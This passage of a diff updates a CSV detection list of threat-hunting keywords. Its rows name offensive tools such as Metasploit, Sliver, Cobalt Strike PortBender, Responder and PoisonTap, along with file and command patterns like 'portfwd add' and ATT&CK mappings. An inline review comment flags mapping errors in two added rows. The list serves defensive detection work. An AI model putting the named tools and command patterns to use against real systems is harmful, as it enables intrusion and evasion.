security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*POC_CloudFilter_ArbitraryFile_EoP.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*POC_CloudFilter_ArbitraryFile_EoP*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*POC_CloudFilter_ArbitraryFile_EoP.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*POC_DLL.dll*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*POC1*implant.cpp*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*POC2*implant.cpp*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" -"*pocs_go/*/CVE-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - 
T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*podalirius@protonmail.com*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*podman run * --name avred -d avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*pocs_go/*/CVE-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*podalirius@protonmail.com*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*podman run * --name avred -d avred*","offensive_tool_keyword","avred","Avred is 
being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*poetry run bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*poetry run NetExec *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*poison_ivy_c2*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Poisoners-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*poisonivy_bof.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*poisontap*","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. 
exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/samyk/poisontap","1","0","N/A","N/A","10","6026","1027","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z" +"*poetry run NetExec *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*poison_ivy_c2*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Poisoners-Session.log*","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*poisonivy_bof.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*poisontap*","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. 
exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/samyk/poisontap","1","0","N/A","N/A","10","6027","1027","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z" "*polenum *-protocols *","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*polenum -h*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" -"*pony-02.aftxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*pornhub.py*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*pony-02.aftxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*pornhub.py*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" "*port_forward_pivot.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan 
- APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*port_scanner_ip_obj.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*port_scanner_regex.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" "*PortBender backdoor*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender redirect*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.cna*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" 
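Review bot: The two added `red-python-scripts` rows (`*port_scanner_ip_obj.py*` and `*port_scanner_regex.py*`) list `T1065`, which ATT&CK has deprecated in favour of T1571, so any consumer that joins this column against the current technique list gets a dead reference. Neither ID describes a port scanner as well as the `T1046` already present, so I would reduce the field to `"T1046"`, or `"T1190 - T1046"` if the exploitation mapping is intended. The `metadata_category` value `Collection` also disagrees with the tactics on the same rows (`TA0001 - TA0007`, no TA0009); `Discovery`, as used on the `polenum` rows in this hunk, would be consistent. The description on both rows has a typo, `scirpts` for `scripts`.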
@@ -14853,15 +15021,15 @@ "*PortBender.sln*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*PortBender.zip*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*portfwd add ?l *-p *-r *","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Port forwarding","10","10","N/A","N/A","N/A","N/A" -"*portfwd add --bind *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*portfwd add -r *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*portfwd add --bind *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - 
T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*portfwd add -r *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*portscan*","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/zs5460/portscan","1","0","N/A","N/A","1","13","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z" -"*portscan.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*portscan.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*portscan_result.cna*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system 